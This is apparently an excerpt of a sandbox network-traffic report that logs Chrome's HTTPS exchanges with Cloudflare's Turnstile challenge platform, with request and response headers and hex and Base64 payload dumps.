                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:46 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 59 00 00 00 3c 08 02 00 00 00 82 50 81 11 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDRY<PIDAT$IENDB`


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      44192.168.2.1649785104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:47 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8d7d4685edbf2e64/1729807604265/363bbcac171fc49723b606fe2c3bbae6643d39b01f80c6b29a6166b7a496e152/LVj0GcfZqK1x_oC HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/pbjvg/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:47 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:47 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 1
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:47 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4e 6a 75 38 72 42 63 66 78 4a 63 6a 74 67 62 2d 4c 44 75 36 35 6d 51 39 4f 62 41 66 67 4d 61 79 6d 6d 46 6d 74 36 53 57 34 56 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                                                                      Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gNju8rBcfxJcjtgb-LDu65mQ9ObAfgMaymmFmt6SW4VIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:47 UTC1INData Raw: 4a
                                                                                                                                                                                                                                                                                      Data Ascii: J


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      45192.168.2.1649784104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:47 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8d7d4685edbf2e64/1729807604264/bGQz0E0r8tNdFNx HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:47 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:47 GMT
                                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                                      Content-Length: 61
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d46abf8bf345b-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:47 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 59 00 00 00 3c 08 02 00 00 00 82 50 81 11 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDRY<PIDAT$IENDB`


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      46192.168.2.1649786104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:48 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1041210751:1729804200:EX5o_Jib2BRptk39-Ko6VfqV46eJeVfLarh36c9cMos/8d7d4685edbf2e64/7TuWtbLSQN.Xjh5Spy1Jb1hTl4eJGwQYcdxRtHPb8J4-1729807601-1.1.1.1-Y4E2900AozGcxEtMBBe9eQoPzPH1KMizuWhT3j.Jx46rLnho_zA4bsvLSqomjPaZ HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 31111
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      CF-Challenge: 7TuWtbLSQN.Xjh5Spy1Jb1hTl4eJGwQYcdxRtHPb8J4-1729807601-1.1.1.1-Y4E2900AozGcxEtMBBe9eQoPzPH1KMizuWhT3j.Jx46rLnho_zA4bsvLSqomjPaZ
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/pbjvg/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:48 UTC16384OUTData Raw: 76 5f 38 64 37 64 34 36 38 35 65 64 62 66 32 65 36 34 3d 24 5a 41 65 4b 53 78 66 44 79 41 78 5a 32 56 2d 67 78 4b 6b 47 54 79 78 50 6b 55 6b 78 71 32 79 6b 33 6b 71 71 53 56 78 47 47 6b 43 25 32 62 6b 32 30 66 6b 24 6b 65 31 58 6e 6a 78 6f 2d 52 6b 32 46 78 39 6b 4c 54 6b 65 6b 77 6a 6b 73 58 53 35 47 63 45 6b 6b 76 6b 41 58 53 4c 66 6b 6a 4c 31 31 53 24 65 2d 6a 6b 33 65 54 79 6a 52 6b 79 58 45 6d 59 64 45 71 78 4c 6b 68 63 76 68 4f 59 6b 54 44 6b 55 78 67 58 2d 4c 6b 38 45 45 65 6b 2d 54 6b 6b 6c 45 6b 61 52 65 78 6c 55 6b 6b 61 66 33 41 56 39 76 32 67 75 6b 2d 4e 54 6b 6b 35 6d 55 6e 4d 45 71 6b 67 52 46 68 69 66 34 32 4c 47 53 4b 56 6b 36 39 61 47 44 4c 4c 6b 6b 5a 6b 46 35 4c 67 4b 78 4a 48 6c 45 4c 67 68 63 58 51 77 31 56 6b 35 33 56 24 52 33 6d 30
                                                                                                                                                                                                                                                                                      Data Ascii: v_8d7d4685edbf2e64=$ZAeKSxfDyAxZ2V-gxKkGTyxPkUkxq2yk3kqqSVxGGkC%2bk20fk$ke1Xnjxo-Rk2Fx9kLTkekwjksXS5GcEkkvkAXSLfkjL11S$e-jk3eTyjRkyXEmYdEqxLkhcvhOYkTDkUxgX-Lk8EEek-TkklEkaRexlUkkaf3AV9v2guk-NTkk5mUnMEqkgRFhif42LGSKVk69aGDLLkkZkF5LgKxJHlELghcXQw1Vk53V$R3m0
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:48 UTC14727OUTData Raw: 47 6d 54 6d 78 4c 78 33 65 38 41 6b 72 72 6b 78 69 78 4e 65 69 6b 31 6b 66 71 24 68 78 59 41 72 45 43 41 53 36 49 2b 42 57 48 53 49 6b 6b 2d 41 65 53 44 6b 68 65 24 65 6b 5a 6b 65 2b 6e 4b 68 76 6b 2d 6b 24 71 78 39 71 55 6b 2d 71 78 75 53 47 6b 54 65 78 66 6b 4d 71 79 41 53 45 6b 79 65 41 70 4e 72 6b 72 65 36 39 6b 65 6b 35 65 2d 44 6b 32 6b 68 65 2d 65 78 49 6b 54 65 24 39 78 6c 6b 56 6b 41 5a 78 75 71 6c 30 6e 71 78 79 78 4f 65 32 71 6b 58 6b 75 58 43 7a 31 6d 65 38 6a 2d 36 44 61 6b 38 6a 79 5a 53 6a 6b 38 6b 6b 30 68 43 6b 78 6b 6b 56 78 50 49 47 65 79 52 6b 4b 65 38 6a 32 65 78 43 6b 57 71 6e 73 78 65 6b 4b 6b 6b 41 78 69 6b 59 65 79 52 6b 69 78 66 5a 47 76 4d 49 6b 49 65 6a 7a 53 4e 6b 41 5a 53 76 6b 4b 65 72 30 65 71 6b 6c 6b 46 58 6a 5a 2b 42 52
                                                                                                                                                                                                                                                                                      Data Ascii: GmTmxLx3e8AkrrkxixNeik1kfq$hxYArECAS6I+BWHSIkk-AeSDkhe$ekZke+nKhvk-k$qx9qUk-qxuSGkTexfkMqyASEkyeApNrkre69kek5e-Dk2khe-exIkTe$9xlkVkAZxuql0nqxyxOe2qkXkuXCz1me8j-6Dak8jyZSjk8kk0hCkxkkVxPIGeyRkKe8j2exCkWqnsxekKkkAxikYeyRkixfZGvMIkIejzSNkAZSvkKer0eqklkFXjZ+BR
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:48 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:48 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 26300
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cf-chl-gen: owqDBJ80YdXSD+pjVyIXL+joO23wfd7zkx0xjlZnglJFX9mBKo6P3FAQoV3FHc+T+n9ZhlUyAAOTYcfd$5m2ZdTyF5Qv3QMdR
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d46b1e9126bb6-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:48 UTC1039INData Raw: 64 6c 56 69 6a 59 39 72 61 31 32 4d 6c 6d 74 66 68 49 39 6b 6f 47 47 56 6b 32 4a 32 64 61 74 6d 65 6e 6c 2b 67 48 52 39 6a 70 69 48 6b 32 79 53 6a 49 36 49 69 4b 47 50 6b 33 32 78 75 71 57 5a 6e 36 6d 42 79 4b 71 71 6c 37 6d 71 78 4b 4f 37 72 34 7a 4c 79 4e 57 78 32 70 75 55 78 74 72 66 32 4a 79 61 31 35 36 6c 74 64 53 65 35 2b 69 34 75 74 37 62 38 50 44 49 35 2b 4f 77 39 4d 4c 56 30 4d 50 4e 74 76 76 71 32 62 76 4c 32 64 33 41 32 77 59 43 41 4f 58 58 2b 75 6a 35 79 64 63 4f 41 63 7a 39 79 51 58 31 79 4f 38 57 44 65 63 54 2b 76 6a 71 31 66 6a 39 32 52 37 69 2b 67 63 6d 42 76 59 41 2b 65 49 6b 48 50 67 71 2f 67 4d 4c 41 67 41 44 4c 79 51 48 4f 76 55 56 50 76 6b 78 45 6a 49 31 4f 68 58 39 51 54 55 5a 46 55 45 6c 54 67 77 4b 42 68 6b 71 44 67 34 6c 49 44 49
                                                                                                                                                                                                                                                                                      Data Ascii: dlVijY9ra12MlmtfhI9koGGVk2J2datmenl+gHR9jpiHk2ySjI6IiKGPk32xuqWZn6mByKqql7mqxKO7r4zLyNWx2puUxtrf2Jya156ltdSe5+i4ut7b8PDI5+Ow9MLV0MPNtvvq2bvL2d3A2wYCAOXX+uj5ydcOAcz9yQX1yO8WDecT+vjq1fj92R7i+gcmBvYA+eIkHPgq/gMLAgADLyQHOvUVPvkxEjI1OhX9QTUZFUElTgwKBhkqDg4lIDI
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:48 UTC1369INData Raw: 61 6b 6d 61 70 71 36 65 6c 64 32 6d 6f 62 5a 71 48 61 6f 47 4f 67 4b 2b 44 68 62 71 4e 64 49 32 34 66 63 43 39 6f 49 2f 43 67 36 57 6d 6b 34 6d 6b 67 36 44 45 6f 63 2f 4c 70 59 54 4b 78 64 4f 68 74 4e 4b 53 78 4b 50 64 79 35 32 62 77 62 6e 63 77 71 4b 66 33 73 47 66 74 38 66 6b 70 36 57 36 7a 64 6e 70 76 4c 43 71 31 62 44 6c 30 38 62 44 30 2b 7a 4b 33 64 44 2b 34 66 6a 36 42 75 58 32 76 2f 6a 43 31 63 54 63 35 67 62 4e 35 39 34 4a 30 75 49 50 41 67 6e 68 38 4d 7a 38 43 42 59 54 44 4e 6b 44 44 78 38 41 49 52 30 70 41 2f 34 6f 34 78 67 6f 44 51 4d 4a 43 51 67 77 2f 52 4d 44 41 51 76 33 44 54 30 4a 43 54 51 57 44 66 37 35 51 55 41 2f 49 43 51 57 41 6b 64 42 50 42 6b 65 4b 7a 39 47 44 67 35 48 4e 6a 5a 58 4a 6c 51 6b 44 6a 77 33 4f 68 39 43 59 45 45 6b 58 44
                                                                                                                                                                                                                                                                                      Data Ascii: akmapq6eld2mobZqHaoGOgK+DhbqNdI24fcC9oI/Cg6Wmk4mkg6DEoc/LpYTKxdOhtNKSxKPdy52bwbncwqKf3sGft8fkp6W6zdnpvLCq1bDl08bD0+zK3dD+4fj6BuX2v/jC1cTc5gbN594J0uIPAgnh8Mz8CBYTDNkDDx8AIR0pA/4o4xgoDQMJCQgw/RMDAQv3DT0JCTQWDf75QUA/ICQWAkdBPBkeKz9GDg5HNjZXJlQkDjw3Oh9CYEEkXD
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:48 UTC1369INData Raw: 6c 35 36 46 69 32 75 70 68 71 57 66 63 49 69 44 70 6f 69 74 76 4a 61 61 65 4c 5a 38 69 70 74 2b 70 72 68 39 6b 73 42 38 79 36 32 61 78 38 79 4e 77 36 72 49 6b 38 4b 73 31 71 79 77 75 74 54 47 78 5a 72 51 75 63 48 4b 7a 4f 43 63 78 4e 75 33 78 62 71 7a 75 62 6a 42 33 4e 71 36 33 37 37 78 77 50 50 31 34 73 37 37 2b 50 33 32 7a 38 6d 37 75 4c 6e 77 76 66 43 2b 35 2b 55 45 78 64 62 6c 39 75 34 4a 41 4f 63 42 79 75 6e 30 35 63 33 6a 30 4f 72 6f 38 64 51 67 45 52 4c 64 2f 41 45 43 37 67 6a 37 39 4f 6b 65 4b 43 4d 71 42 77 34 6e 43 76 49 68 37 54 55 6c 47 42 67 78 4b 78 76 32 2f 53 30 64 50 53 30 76 48 41 41 7a 45 50 6b 64 50 6b 52 49 52 6b 5a 43 54 44 38 52 4c 79 51 77 53 41 6b 77 45 45 55 35 53 6b 68 57 55 54 4a 59 53 6d 42 44 59 45 41 37 4a 6c 56 70 4b 32 77
                                                                                                                                                                                                                                                                                      Data Ascii: l56Fi2uphqWfcIiDpoitvJaaeLZ8ipt+prh9ksB8y62ax8yNw6rIk8Ks1qywutTGxZrQucHKzOCcxNu3xbqzubjB3Nq6377xwPP14s77+P32z8m7uLnwvfC+5+UExdbl9u4JAOcByun05c3j0Oro8dQgERLd/AEC7gj79OkeKCMqBw4nCvIh7TUlGBgxKxv2/S0dPS0vHAAzEPkdPkRIRkZCTD8RLyQwSAkwEEU5SkhWUTJYSmBDYEA7JlVpK2w
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:48 UTC1369INData Raw: 35 47 45 68 59 61 45 63 35 69 34 64 4b 36 76 6a 58 65 68 76 37 4a 36 6d 36 65 69 78 4c 61 6e 6b 36 61 68 6e 38 32 66 76 4d 57 6c 30 36 6d 53 77 64 4c 46 6b 6f 32 6f 73 39 57 61 33 38 4c 53 33 4e 58 53 34 62 61 32 75 64 71 6e 78 62 72 6f 77 61 72 47 7a 74 54 45 35 4b 7a 6e 37 73 66 53 37 4d 2b 35 31 65 66 64 32 66 33 61 39 4f 2b 2f 32 2f 6e 64 78 39 37 6e 79 75 58 6b 41 73 34 4c 7a 2b 62 66 31 68 45 4a 31 76 6b 56 47 76 62 34 47 53 49 42 49 69 4c 78 45 42 45 69 46 77 51 4b 2f 66 6b 75 37 76 76 38 4a 41 6b 78 43 41 38 42 37 69 73 48 4b 2f 63 48 4a 7a 6f 56 45 7a 59 44 48 68 38 59 48 6a 74 48 49 79 74 4d 42 41 55 70 4b 30 67 38 4e 41 6f 52 4a 69 34 69 52 31 59 72 54 68 63 63 47 68 78 50 46 45 46 54 48 31 39 58 56 44 46 56 55 32 70 61 58 56 77 71 4f 54 74 55
                                                                                                                                                                                                                                                                                      Data Ascii: 5GEhYaEc5i4dK6vjXehv7J6m6eixLank6ahn82fvMWl06mSwdLFko2os9Wa38LS3NXS4ba2udqnxbrowarGztTE5Kzn7sfS7M+51efd2f3a9O+/2/ndx97nyuXkAs4Lz+bf1hEJ1vkVGvb4GSIBIiLxEBEiFwQK/fku7vv8JAkxCA8B7isHK/cHJzoVEzYDHh8YHjtHIytMBAUpK0g8NAoRJi4iR1YrThccGhxPFEFTH19XVDFVU2paXVwqOTtU
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:48 UTC1369INData Raw: 78 31 70 48 75 6e 76 58 65 59 72 4b 4b 7a 6b 5a 36 6d 66 38 53 48 75 49 61 65 74 6f 2f 4a 7a 39 4f 4b 71 39 57 4d 31 4b 72 46 6a 4e 50 55 71 35 44 55 6e 64 33 53 33 4d 7a 50 35 36 57 31 77 39 6e 68 74 62 2b 73 75 63 62 41 34 71 58 6a 33 73 54 54 78 4b 76 34 79 73 65 30 31 2f 33 79 39 66 37 4c 2f 64 7a 63 42 4d 48 2b 31 39 58 4c 7a 41 6e 58 35 52 48 79 35 39 44 70 42 2f 51 5a 45 2f 55 4a 44 67 37 63 46 75 6a 35 49 78 34 51 33 74 37 68 45 69 66 79 35 4f 6e 6a 47 53 6f 71 36 77 59 75 4c 65 66 78 4f 66 55 5a 4a 54 4d 34 39 77 6a 32 49 76 4d 77 4f 67 49 6b 41 45 63 79 47 44 35 49 43 30 49 4f 54 43 55 70 50 30 6b 54 55 79 41 53 56 43 55 7a 57 46 59 70 4b 6c 30 65 49 44 31 69 4a 54 77 5a 48 32 45 35 4e 32 4d 2f 50 55 56 76 52 69 38 6c 64 44 4a 55 5a 6a 4a 4d 4f
                                                                                                                                                                                                                                                                                      Data Ascii: x1pHunvXeYrKKzkZ6mf8SHuIaeto/Jz9OKq9WM1KrFjNPUq5DUnd3S3MzP56W1w9nhtb+sucbA4qXj3sTTxKv4yse01/3y9f7L/dzcBMH+19XLzAnX5RHy59DpB/QZE/UJDg7cFuj5Ix4Q3t7hEify5OnjGSoq6wYuLefxOfUZJTM49wj2IvMwOgIkAEcyGD5IC0IOTCUpP0kTUyASVCUzWFYpKl0eID1iJTwZH2E5N2M/PUVvRi8ldDJUZjJMO
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:48 UTC1369INData Raw: 57 77 61 75 53 66 62 72 41 70 71 62 4a 74 4d 44 4e 6d 4c 43 4a 6d 74 48 42 79 4a 48 48 75 4b 72 45 6c 4e 4f 76 30 64 50 5a 73 36 2b 62 33 35 37 52 32 64 37 52 74 2b 66 6c 71 74 6d 75 32 71 36 74 71 75 76 74 39 64 44 68 73 73 62 77 35 4e 72 6c 2b 65 44 66 7a 76 37 73 31 4e 62 37 35 39 66 58 31 50 51 42 34 67 45 48 7a 74 76 4e 44 76 4d 52 30 42 55 43 30 74 49 56 42 76 76 58 47 50 4d 57 47 41 38 4e 48 75 55 61 48 76 34 71 46 50 72 6c 49 79 6b 50 44 7a 49 64 4b 54 59 42 47 66 45 44 4f 69 6f 78 2b 54 41 68 45 79 33 38 51 53 37 2b 52 55 49 6f 52 6b 70 47 4e 69 52 4b 54 43 51 6f 53 55 77 50 4e 45 39 56 4b 69 74 63 52 6a 74 4e 57 6b 46 5a 47 6c 5a 4f 51 79 4a 68 56 6c 31 56 57 56 5a 4e 50 32 74 51 4b 6b 78 6f 62 31 35 49 61 6d 4d 33 4d 7a 74 33 58 48 70 39 65 6d
                                                                                                                                                                                                                                                                                      Data Ascii: WwauSfbrApqbJtMDNmLCJmtHByJHHuKrElNOv0dPZs6+b357R2d7Rt+flqtmu2q6tquvt9dDhssbw5Nrl+eDfzv7s1Nb759fX1PQB4gEHztvNDvMR0BUC0tIVBvvXGPMWGA8NHuUaHv4qFPrlIykPDzIdKTYBGfEDOiox+TAhEy38QS7+RUIoRkpGNiRKTCQoSUwPNE9VKitcRjtNWkFZGlZOQyJhVl1VWVZNP2tQKkxob15IamM3Mzt3XHp9em
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:48 UTC1369INData Raw: 6d 35 50 44 78 5a 2b 72 69 63 71 6a 6d 34 7a 4e 7a 62 33 54 30 4a 58 56 32 4e 65 76 79 5a 62 61 79 62 2f 67 33 4b 4b 2f 35 4e 2b 6d 74 2b 6a 6d 35 64 58 72 36 64 6e 50 38 75 37 47 70 2b 2f 78 34 63 2b 78 39 75 58 74 74 66 72 6f 73 77 50 2b 2f 41 49 47 41 77 4c 62 43 41 62 4b 2b 63 55 4d 34 39 38 52 44 4e 4c 6a 30 42 49 42 79 78 73 56 32 75 73 67 47 76 50 72 48 42 34 65 38 39 30 6b 2b 78 49 72 4a 65 6f 61 4c 43 6e 74 4c 6a 4d 75 4c 67 7a 74 4d 7a 49 59 50 44 63 32 4a 6a 30 34 2f 68 54 35 50 68 67 6b 52 45 4d 79 4a 41 56 47 49 44 5a 49 53 6b 6f 77 55 45 30 54 4b 41 35 53 51 6b 5a 59 56 68 70 61 59 46 6b 66 55 6d 52 66 4f 45 35 6c 5a 44 73 63 4a 6d 51 72 50 43 68 72 52 45 68 79 62 6d 35 49 65 48 49 32 64 6e 78 32 64 54 42 2b 65 6d 70 71 50 48 35 2b 58 49 43
                                                                                                                                                                                                                                                                                      Data Ascii: m5PDxZ+ricqjm4zNzb3T0JXV2NevyZbayb/g3KK/5N+mt+jm5dXr6dnP8u7Gp+/x4c+x9uXttfroswP+/AIGAwLbCAbK+cUM498RDNLj0BIByxsV2usgGvPrHB4e890k+xIrJeoaLCntLjMuLgztMzIYPDc2Jj04/hT5PhgkREMyJAVGIDZISkowUE0TKA5SQkZYVhpaYFkfUmRfOE5lZDscJmQrPChrREhybm5IeHI2dnx2dTB+empqPH5+XIC
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:48 UTC1369INData Raw: 4d 65 4c 6e 37 72 43 74 64 58 4d 7a 35 4f 76 77 73 71 39 33 64 54 58 6d 35 71 68 30 74 7a 68 75 2b 53 33 75 39 2f 63 31 4f 6e 74 35 38 47 70 38 75 71 76 72 75 2f 78 79 38 76 77 38 4e 76 50 38 2f 44 6f 2f 51 4c 39 37 50 55 41 2b 4d 59 4a 43 67 50 48 78 67 67 41 34 75 2f 67 43 66 54 39 43 67 66 55 30 75 6f 54 2f 41 6f 56 47 4e 76 61 34 52 58 32 49 76 6f 6c 2b 43 59 6b 48 4f 6f 75 41 53 6a 72 4b 76 45 65 48 53 49 49 4d 50 50 32 4d 54 54 33 4d 76 30 77 45 7a 34 54 51 52 55 79 51 44 63 48 53 68 6c 45 43 44 59 4f 4f 6a 6b 2b 4b 55 77 51 43 45 31 46 4b 53 78 44 56 52 6c 65 48 6b 70 4a 54 6a 46 63 49 44 68 50 59 53 56 71 59 57 51 6f 51 46 64 71 51 6e 49 79 58 6c 31 69 52 6e 41 30 54 47 4e 32 54 6e 35 31 65 44 78 55 61 33 35 6d 68 6b 5a 79 63 58 5a 62 68 45 68 67
                                                                                                                                                                                                                                                                                      Data Ascii: MeLn7rCtdXMz5Ovwsq93dTXm5qh0tzhu+S3u9/c1Ont58Gp8uqvru/xy8vw8NvP8/Do/QL97PUA+MYJCgPHxggA4u/gCfT9CgfU0uoT/AoVGNva4RX2Ivol+CYkHOouASjrKvEeHSIIMPP2MTT3Mv0wEz4TQRUyQDcHShlECDYOOjk+KUwQCE1FKSxDVRleHkpJTjFcIDhPYSVqYWQoQFdqQnIyXl1iRnA0TGN2Tn51eDxUa35mhkZycXZbhEhg


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      47192.168.2.1649787104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:49 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1041210751:1729804200:EX5o_Jib2BRptk39-Ko6VfqV46eJeVfLarh36c9cMos/8d7d4685edbf2e64/7TuWtbLSQN.Xjh5Spy1Jb1hTl4eJGwQYcdxRtHPb8J4-1729807601-1.1.1.1-Y4E2900AozGcxEtMBBe9eQoPzPH1KMizuWhT3j.Jx46rLnho_zA4bsvLSqomjPaZ HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:49 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:49 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                                                      Content-Length: 7
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cf-chl-out: J3Yw7at9e7w+2BvS1j5q18Kp5GY4A7l/rZo=$4ZSlWyEgDskXZQLn
